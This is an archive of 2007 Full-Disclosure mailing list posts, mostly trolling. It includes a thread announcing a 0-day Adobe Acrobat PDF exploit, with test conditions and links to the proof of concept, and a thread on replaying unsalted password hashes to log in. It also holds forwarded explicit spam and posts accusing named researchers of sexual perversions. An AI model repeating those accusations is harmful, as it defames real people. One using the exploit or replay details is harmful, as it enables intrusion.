it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcWTeEACgkQqTTbVuUWvbL7LgP/b8ib2UBMcPrOyi3cVtFtveVObHlP p1h19e9S1b4AX8POCp/C1+ZnoqIv51iAEgAQVAaRTewpk/JDuDMq2D34+qGQis5l3Tvv Nm37F96N3WTZ8B20CFMLAnumQXwVHaXo4u3pbpgEW3C6oYApd8uYqG/PuBYn5LzTQNqt g8VyM/g= =oTlt -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Most Secure Browser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear List, I am currently tasked with evaluating which webbrowser is the most secure, to be deployed across all machines at the fortune 500 corporation I'm currently working at. Can you, armchair security enthusiast and full-disclosure reader, assist me in this endeavor? I am looking for: 1) Personal favorite browser, 2) Most secure browser, 3) Best browser plugins, 4) Favorite youtube video, 5) Best browsing policies Thanks and good night. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcWUAUACgkQqTTbVuUWvbKizgQAjt7NBsKLZ2RDQgqfsmEELpmNcDbf eaYEJCe1Oq0hmYi3LaPQJWfCJob0DQJtrkq0yQQHUTRZAR2+WpelRKZc2jvkfAdqQDEt LNoXZU1N8v3ZYm+E8DxJdUmymA9rmLV1Y6JYkxOyCLQkMFtfzh8bJkZUbFuLrBvOZX+h A5fPVZU= =xA/g -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Netscape Navigator 9.0 fixes several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 In your professional opinion, is upgrading to the latest version the best decision? Or is there a better browser to use? - -JPelinks4lyfe On Wed, 17 Oct 2007 11:55:28 -0400 Juha-Matti Laurio juha- [EMAIL PROTECTED] wrote: It appears that new version of Netscape has been released. More information at Release Notes :: Netscape Navigator Web Browser http://browser.netscape.com/releasenotes/ New Netscape Navigator 9 ships security fixes and is multi- platform http://blogs.securiteam.com/?p=1019 The new version is based to Mozilla Firefox 2.0.0.7 codebase (from UA: rv:1.8.1.8pre Gecko/20071015 Firefox/2.0.0.7 Navigator/9.0). Solution: Upgrade to version Netscape Navigator 9.0 http://browser.netscape.com/downloads/ - Juha-Matti ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcWTxMACgkQqTTbVuUWvbJNIgQAjiVva4BM2rShCciw4Ir+Ke5EI6xS V+jhaKnyahuUB5wSxBJAXN5Oel/VMyl/RFzq8Z1KFgkZvPA2g9WGSQCBdLrpYhvJLkIX +0X4IFjm8ktHBN+Fqinj0PvFFISHxVZUqro8cTXMS1VUTu4Z8gTv5PAKNhoZ8cQRMy5C V0wmP7o= =pMrE -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: To the list admin: address change.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 John, I believe I digitally intercepted this blackberry user's email. - - Forwarded message from [EMAIL PROTECTED] - Please change my subscription address to: [EMAIL PROTECTED] Thank you! Erik Laykin Sent via BlackBerry by ATT - -Original Message- From: [EMAIL PROTECTED] Date: Wed, 17 Oct 2007 14:10:13 To:full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Most Secure Browser - -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear List, I am currently tasked with evaluating which webbrowser is the most secure, to be deployed across all machines at the fortune 500 corporation I'm currently working at. Can you, armchair security enthusiast and full-disclosure reader, assist me in this endeavor? I am looking for: 1) Personal favorite browser, 2) Most secure browser, 3) Best browser plugins, 4) Favorite youtube video, 5) Best browsing policies Thanks and good night. - -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcWUAUACgkQqTTbVuUWvbKizgQAjt7NBsKLZ2RDQgqfsmEELpmNcDbf eaYEJCe1Oq0hmYi3LaPQJWfCJob0DQJtrkq0yQQHUTRZAR2+WpelRKZc2jvkfAdqQDEt LNoXZU1N8v3ZYm+E8DxJdUmymA9rmLV1Y6JYkxOyCLQkMFtfzh8bJkZUbFuLrBvOZX+h A5fPVZU= =xA/g - -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcWaUoACgkQqTTbVuUWvbIx1QP/Xh0/3d8Bv1dtwOVYX7MAYptfB4S5 qGwRjd1aIFI+inwWxiab/TnKHqTNSCc1E1MdHpSxyKBGvYy0Bb977/xr+o0xj4ggsaMg 3t2o2GgA1kXqf6oeNVS6lrQa91+ozR5zHnYuYnTe56U5ne26kjWNbneF1ZIXXDUvKjY5 AFQf7zY= =MbKY -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Zone-H.org: 10 reasons websites get hacked
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I thought the main reasons for intrusion were fun and/or profit. I don't see them on your list anywhere. I think your list sucks. On Wed, 17 Oct 2007 16:46:35 -0400 Juha-Matti Laurio juha- [EMAIL PROTECTED] wrote: This is dated 10th Oct but always useful: Zone-H.org - 10 reasons websites get hacked http://www.zone-h.org/content/view/14865/1/ based to OWASP Top 10 list. - Juha-Matti ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcWsz8ACgkQqTTbVuUWvbJ8OwP9F+YlPAOsCjm/4RxnqaykzlcMVRDm OHaRbxnE0SfOBomfmB+9TZelOUiTAnGUwGhsz4oVyVxcrivNa2dLq5sUpgdyoGVD6DDg acefNYRMjnSW930Jxyc8YnW89SEY0OLOsHYhSCBtFRAInRD40FmfGaCE8utIZuWPhfVT kny8a9g= =BBDz -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Most Secure Browser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Thanks bud. Incidentally, we have been seeing a lot of s0ftpj.org posts lately - is your hacker group trying to make a comeback? If so, why? I think r00tabega should return as well! - -JPscene historian is written between my bra and ket lulz! On Wed, 17 Oct 2007 19:54:45 -0400 vecna [EMAIL PROTECTED] wrote: Hi, I am currently tasked with evaluating which webbrowser is the most secure, to be deployed across all machines at the fortune 500 corporation I'm currently working at. Can you, armchair security enthusiast and full-disclosure reader, assist me in this endeavor? I am looking for: 1) Personal favorite browser, firefox, for the plugins support 2) Most secure browser, opera, because is the less used at the moment :) 3) Best browser plugins, mixtab 4) Favorite youtube video, what's matter ? is for a psy profiling analysis ? anyway: http://www.youtube.com/watch?v=K2cYWfq--Nw 5) Best browsing policies a lot of tab (20 - 50) for collect in the day and read after. Thanks and good night. you too. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcWtPoACgkQqTTbVuUWvbIatwP+I8B3RDKJmVoqK0sOg7hhF1UyV5Mc cBG0f2VnONdAMcz1AE6qdPHqRWgfla/hGSBz7ZnDX6RxvHkaxASd5i0rfRq3Omy/f57U dv1GVxqcKXSlMQmTZY4HKyZJb/2Nkx5qQDjaB/C1Jb1klTuHsN2geLwE3sJKN+gmijZ0 mz3iOfg= =JzZD -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] pdp architect, drraid, beastiality, and incest
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 What have you ever done for security On Tue, 16 Oct 2007 01:13:41 -0400 scott [EMAIL PROTECTED] wrote: Do you understand the concept of protecting people and corporations from total idiots trying to gain access to their systems?PDP just lets others know what he found,while the offending company is working on a fix,in a minimal way. If you were a true researcher,you should be able to find the same with the clues he provides.Yay for PDP not feeding script kiddies! phioust wrote: While it may be immature to make fun of pdp architect and drraid about incest and beastiality while its probably not true, I still wonder why they would post info about vulnerabilities only to not release them. The only thing i can think of is 'fame' and its obviously working against them. *pdp architect, drraid, beastiality, and incest* On 10/15/07, scott [EMAIL PROTECTED] wrote: Why don't you grow up and go away! [EMAIL PROTECTED] wrote: What do these things have in common? Well for one pdp and drraid share an extremme fetish for sick porn, but also they love to post info on future ( read non- existant ) 0day/exploits that they have possession of. As noted in previous research [1] drraid posted claims of ssh 0day [2] which were never verified and no advisory has been made. Our email to Avert labs at McAfee went unanswered. We still wonder why its employees are holding 0day information from the public. We also wonder why pdp architect ( incest fetish lover ) makes similar types of posts [3] about skype when he works for a pentration testing company. We have also heard news that pdp is using 0day xss bugs in incestboards.com to view the members only board where he shares stories about love affaris between him, his dog, and his grandfather. To pdp architect: incest isnt natural no matter how good it feels. [4] ps: many lulz @ [5] [1] http://seclists.org/fulldisclosure/2007/Sep/0705.html [2] http://drraid.blogspot.com/2007/09/ssh-keep-it-secret.html [3] http://www.gnucitizen.org/about/pdp#comment-50201 [4] http://www.way2hope.org/incest_survivors_help.htm [5] http://www.gnucitizen.org/about/pdp#comment-3 imul martinez (heil brazil) (imul AT hushmail DOT com) Food Director of lul-disclosure Corp. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcUwAkACgkQ+dWaEhErNvQaKwP+J23QcLECyvOmIadv4ideZwX7iMRL ObqbPA04OWoExesLA+EAZBvXQtH/+iEVN6UmKK7LT5Dq/rR3vHEEoON10UVvLy9acZJb l9XKMsB0GcdxDcJ3CiZeBUUimgNTjoFy90GLjvWBx77/idyLBQyeGceJTXXfhG4c51B8 27dtExw= =/feB -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0-day PDF exploit
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear 3APAPA, Please configure your Internet Exploring mechanisms in a fashion compliant with my exploitation technologies to demonstrate the severity of my proof of concept attack tools. Here is a list of criteria to fulfill to make the hacker attack possible. This is severe! Millions who follow the instructions in detail might be vulnerable under the right situations sometimes... yawn. - -JPi dont use apostrophes On Tue, 16 Oct 2007 11:27:23 -0400 [EMAIL PROTECTED] wrote: ...some additional information about 0day PDF exploit PoC: Please download and open PDF PoC _locally_ in Adobe Acrobat (not in Adobe Acrobat ActiveX control because of some internal restrictions within Adobe ActiveX, it may be bypassed via: http://seclists.org/bugtraq/2007/Oct/0213.html but i didn't made tests). Also make sure that mailto handler is set to Internet Explorer 7 (any 3rd party mail clients is not installed). PoC tested on WinXP SP2 Eng updated + Internet Explorer 7 + Adobe Acrobat Reader 8.1 PoC: http://security.fedora-hosting.com/0day/pdf/pdf_poc.pdf Details: http://security.fedora-hosting.com/0day/pdf/pdf_poc.txt regards, cyanid-E [EMAIL PROTECTED] -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcU2sAACgkQ+dWaEhErNvTD2AP9GWi6tgjXfSS6mmSEcNXCngEnJAXf 8p8i57pby3KmK6Os29OeesSIedRgM81MxrF8bZ2itPpNYtyrVAC5ztWEfAVJDP01z9CL 93B9OS/IdedZSvXokQAHrtEdO6wZHarddeE772GG3RfWlY5a/SA8agWUIkGAALugJyvR gPyqE40= =sCNw -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: Experience masturbation like never before.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Why am I getting emails like this? - - Forwarded message from Alexander Murdock [EMAIL PROTECTED] - It so hard to find a virgin nowadays. With the Personal Puss! your dreams come true! Ordering your Personal Puss! you'll receive a virgin pussy and experience new sensations of breaking the hymen. Try this really amazing Personal Puss! that gives you a sensation of a nice hot and gooey pussy. Designed to be soft stretchable and allow you a proper firm grip, it is made of the best modern materials, safe and non-allergic. http://dbbride.com Your own Personal Puss! is just waiting for you. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcU3uUACgkQ+dWaEhErNvQ71QP5Aezm7O5wI15UnBoNm4hpJ7anNSNn 0qRMv1PW5ZEoWuEht/XJLrpITVORFppLEMGUPneBrJOYDWlKL+qga5n0wNqkwQAQEpSY ggdFtRM5+mzULv5V4+L85uAM+X6SUXWgFLO9VqD//EggDpc+1Uv0D5HIKSXToJBh0jPw jYqXjjA= =GOkK -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] pdp architect, drraid, beastiality, and incest
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 LOL On Tue, 16 Oct 2007 12:35:57 -0400 Morning Wood [EMAIL PROTECTED] wrote: Do you understand the concept of protecting people and corporations from total idiots trying to gain access to their systems?PDP just lets others know what he found,while the offending company is working on a fix,in a minimal way. If you were a true researcher,you should be able to find the same with the clues he provides.Yay for PDP not feeding script kiddies! dunno but every sec researcher I know in the private sector would never release any info without it being fully authorized by his / her employer. Possibly we will see these idiots looking for a new job soon? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcU7mUACgkQ+dWaEhErNvSvkwP+MOv7/viMMSZM+0MjjoO7Zw85d77U UqixbZf1SqnWSb/MyxlAYd8YSbRLzVU4nKFyvxH8Y6xBGODIYZ99Cd1TnMnKngWlcEME V24jpRerL0q6Mi0e37El+4ooHlAzgpklzLCRUPSsAn/RxUdvkOy3Ys+u30nzR8wNOY5m 9wSj0jk= =vUn5 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0-day PDF exploit
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 You're about as funny as the severity of your hacking tools or something. On Tue, 16 Oct 2007 13:07:48 -0400 [EMAIL PROTECTED] wrote: negative. just a ':' and ')' concatenated characters with love, cyanid-E 2007/10/16, [EMAIL PROTECTED] full- [EMAIL PROTECTED]: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Theoretically that is a smiley face right? On Tue, 16 Oct 2007 11:56:47 -0400 [EMAIL PROTECTED] wrote: :) 2007/10/16, [EMAIL PROTECTED] full- [EMAIL PROTECTED]: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear 3APAPA, Please configure your Internet Exploring mechanisms in a fashion compliant with my exploitation technologies to demonstrate the severity of my proof of concept attack tools. Here is a list of criteria to fulfill to make the hacker attack possible. This is severe! Millions who follow the instructions in detail might be vulnerable under the right situations sometimes... yawn. - -JPi dont use apostrophes On Tue, 16 Oct 2007 11:27:23 -0400 [EMAIL PROTECTED] wrote: ...some additional information about 0day PDF exploit PoC: Please download and open PDF PoC _locally_ in Adobe Acrobat (not in Adobe Acrobat ActiveX control because of some internal restrictions within Adobe ActiveX, it may be bypassed via: http://seclists.org/bugtraq/2007/Oct/0213.html but i didn't made tests). Also make sure that mailto handler is set to Internet Explorer 7 (any 3rd party mail clients is not installed). PoC tested on WinXP SP2 Eng updated + Internet Explorer 7 + Adobe Acrobat Reader 8.1 PoC: http://security.fedora-hosting.com/0day/pdf/pdf_poc.pdf Details: http://security.fedora- hosting.com/0day/pdf/pdf_poc.txt regards, cyanid-E [EMAIL PROTECTED] -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcU2sAACgkQ+dWaEhErNvTD2AP9GWi6tgjXfSS6mmSEcNXCngEnJA X f 8p8i57pby3KmK6Os29OeesSIedRgM81MxrF8bZ2itPpNYtyrVAC5ztWEfAVJDP01z9 C L 93B9OS/IdedZSvXokQAHrtEdO6wZHarddeE772GG3RfWlY5a/SA8agWUIkGAALugJy v R gPyqE40= =sCNw -END PGP SIGNATURE- -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcU7oUACgkQ+dWaEhErNvTuzAP/bgT6FkLr1a/g4ICZ+G+vIFympNG 2 LRHvwum/30YdR4i3SCeASVioRI7N4Cty6cH0jKjF2DMp/uRJORsdHFXv4lJnquGo2lV H li1RC5L8XsJkQ15S6MlHfIGPUvQri60h8DZwEtHn5eKzi8pQmTcBR8EKq9LkbrCMrnM l ObNbaRU= =gaS9 -END PGP SIGNATURE- -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcU8MgACgkQ+dWaEhErNvR8pQP/d3WTIy9grtZOnVXBUkIGN8PskQkY 9c/UqQwTsWYvhbH18zcwI/5KGeBRKU3EoNvSsg2fVUQMAlG+V7HkkcVB389RkrntSlsq nLDBDy5e6Rf7lGsENwCT0RWq8nCIhO7cKjrMGaUfR/jC5c4F13JJEgqC4j20wjG9FP6Y aoH2Qms= =ZERQ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Experience masturbation like never before.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 hahahahahahaha good one On Tue, 16 Oct 2007 13:05:56 -0400 Brandon S. Allbery KF8NH [EMAIL PROTECTED] wrote: On Oct 16, 2007, at 11:55 , [EMAIL PROTECTED] wrote: Why am I getting emails like this? cynic because f-d is 99% wanking anyway? /cynic -- brandon s. allbery [solaris,freebsd,perl,pugs,haskell] [EMAIL PROTECTED] system administrator [openafs,heimdal,too many hats] [EMAIL PROTECTED] electrical and computer engineering, carnegie mellon university KF8NH -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcU8NYACgkQ+dWaEhErNvR9owP/dC+6n5drr/gXwOvt2qzp30DUHeW1 a5RsZhDDNrIHzyeTnjVx8YQzM9bm812PpUP/xoLEkN4/DTlO+Z9BJy6Z23c0YOnp9/XN JlM4ebHF9SJFTXuHxkTSRtVu6IIDD/zBfQw9vPFyY1huTWhecUvUVosJQG+6F+d4yBIK 1agtkIU= =Gy76 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Experience masturbation like never before.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 What is it then? On Tue, 16 Oct 2007 13:57:55 -0400 [EMAIL PROTECTED] wrote: On Tue, 16 Oct 2007 11:55:17 EDT, [EMAIL PROTECTED] said: Why am I getting emails like this? Obviously, the spammers have learned the secret of targeted marketing. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcVAcQACgkQ+dWaEhErNvSa3gP5AXq4yJqozOQhpaJg/WtXwUcRrxz6 ncYXpsrN5Lt2ZU3ehbwiTUZHuSq3JCo259u/9+KhL8fM5UBM1YScPnh6GA+dTEB4iGNb /aFymB4V26wUXV/NJLk/hcPEWKrxJ08dznUg4qJGYD2q/mT/Voff9OKbtVc8wIBwR+Tf 9ddML2Q= =VF6Y -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0-day PDF exploit
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 with all the conditions that need to be met, and the fact that it is still going to be user assisted wouldn't it be easier to just get the targeted user to run the executable directly? i suppose with this xss/xsrf/b4b0 tactic you can bypass the firewalls at least and militarily grade brute force the login for the win. whatever pays the bills bro. On Tue, 16 Oct 2007 14:25:52 -0400 [EMAIL PROTECTED] wrote: no, it's my PoC exploit and product of my researching based on public information that pdp given in his blog regards, cyanid-E 2007/10/16, phioust [EMAIL PROTECTED]: is pdp architect releasing more 0day into the wild without his companies knowledge? I think this breaks the contract from any serious security company. I believe a message from him explaining his positions on such things is appropriate or maybe a message from his employeer about their disclosure policies? On 10/16/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Zero day PDF exploit for Adobe Acrobat Workaround: Currently unavailable. Thanks to: pdp (at) gnucitizen.org for his investigation ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcVA50ACgkQ+dWaEhErNvSG/wP+KcpZEhZuS5fp8uZd4zEUVgskRCy9 oM9otn0DmulfIY27rkpsdX6fsqPkSc8rgUweWcplkjgCyIsrlco/DPI/oxOgQZZAB3HF E83WVJ62tQBHSaDfWwSJyNCy1t7xfNI7SNWQJs8EZY2AiizO+pYkkidMZRFfkvRjXRVa aiH3ltg= =bWnt -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Experience masturbation like never before.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Who? On Tue, 16 Oct 2007 14:29:21 -0400 Dude VanVinkle [EMAIL PROTECTED] wrote: Someone on FD works for Yambo Financials. lulz - JP. On 10/16/07, [EMAIL PROTECTED] full- [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 What is it then? On Tue, 16 Oct 2007 13:57:55 -0400 [EMAIL PROTECTED] wrote: On Tue, 16 Oct 2007 11:55:17 EDT, [EMAIL PROTECTED] said: Why am I getting emails like this? Obviously, the spammers have learned the secret of targeted marketing. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcVAcQACgkQ+dWaEhErNvSa3gP5AXq4yJqozOQhpaJg/WtXwUcRrxz 6 ncYXpsrN5Lt2ZU3ehbwiTUZHuSq3JCo259u/9+KhL8fM5UBM1YScPnh6GA+dTEB4iGN b /aFymB4V26wUXV/NJLk/hcPEWKrxJ08dznUg4qJGYD2q/mT/Voff9OKbtVc8wIBwR+T f 9ddML2Q= =VF6Y -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcVA+0ACgkQ+dWaEhErNvQ2zwQAhiRYar806zHHoKyp+yLerWJeWwiu 5qycLcr3yVNLhKV6WqourZsLxOsp4RXIhgPWNsaP4Me+5gHH1ZeaKKd44qxtUU9Yomgh C+qkIahuCGkZiOKMT3AoiDiL9gJ2m9Pfi+Wk1IFkzmmS9RGxNiXI5guQIM7ebAKt2r53 b+YL288= =qbLc -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] password hash, funny myth in the industry!
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi 3APAPA, On Tue, 16 Oct 2007 15:30:56 -0400 Bipin Gautam [EMAIL PROTECTED] wrote: hi list, i was reading the article, http://www.f- secure.com/weblog/archives/1293.html but just an example. blah blah blah, this is full-disclosure not some dear diary/myspace bullshit, why do many people out there think password hash can't be as good as the password itself and needs to be computed/cracked first before it can be used? dunno why don't you tell me? Consider the fact, many websites/forums don't use password hash+salt, just password hash( generally SHA1, MD5) that gets computer client side and POSTED to the web-forum for user authentication. done If someone can sniff this, given that, user name is available using simple GUI tools as 'Tamper Data' ( firefox plug in ) even a low tech malicious user can log on with someones credentials without having to crack the password hash, instead just using the password hash itself manipulating the POST request. makes sense? :) no please clarify!!! thanks, -bipin ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcVFTIACgkQ+dWaEhErNvT69AP/f2E9mQoWjU+Tf9/zSAT4LKV6k4jR sozte7HJXySMyvPnku1th5BW5nGBj8uJuvetrmvGAYKjsjhsOpwDSCuwZXbY/kzXJSg2 WZcMOvn/3HCgMxx44MvsgtfjAJAvUa7QoArC7LabPsAVOZrHOy9Ipn/EjOZW7LvRXoVH Nmr86ZE= =IuAp -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] password hash, funny myth in the industry!
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Revolutionary wording! On Tue, 16 Oct 2007 15:46:20 -0400 Thierry Zoller [EMAIL PROTECTED] wrote: BG makes sense? :) Holds true for authentication shemes not designed to be protected against Replay attacks. Challenge-Response - DH - -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcVFWcACgkQ+dWaEhErNvS3LgP/UkYt5O1VFU4D95R26/ysQwP6RIT8 TagOd4DCYX4TlDRTiZ3E9pMsYjvSpLMfzFQ2LazeFJX5YzgDWojicMquntOeFZhsa7CW ii4DqvsrsBqkbAspLREChXP4EhgSTu96jpvZyawV8FFXrrzqVRouSAPg/Jhk98sbXtW9 Qj8DVsM= =Uihi -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Experience masturbation like never before.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Do you understand how email technologies work? I would like to point out that you don't. I'm sure Vladis will have something to say. Since *clearly* you should become an hero. Except for the hushmail part. On Tue, 16 Oct 2007 16:13:52 -0400 Dude VanWinkle [EMAIL PROTECTED] wrote: Those are some pretty good faked headers guys (except for the hushmail part) FYI: No one will notice the difference if you spoof my addy, 'cause I have been filtered for years! -JP On 10/16/07, Dude VanVinkle [EMAIL PROTECTED] wrote: Someone on FD works for Yambo Financials. lulz - JP. On 10/16/07, [EMAIL PROTECTED] full- [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 What is it then? On Tue, 16 Oct 2007 13:57:55 -0400 [EMAIL PROTECTED] wrote: On Tue, 16 Oct 2007 11:55:17 EDT, full- [EMAIL PROTECTED] said: Why am I getting emails like this? Obviously, the spammers have learned the secret of targeted marketing. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: 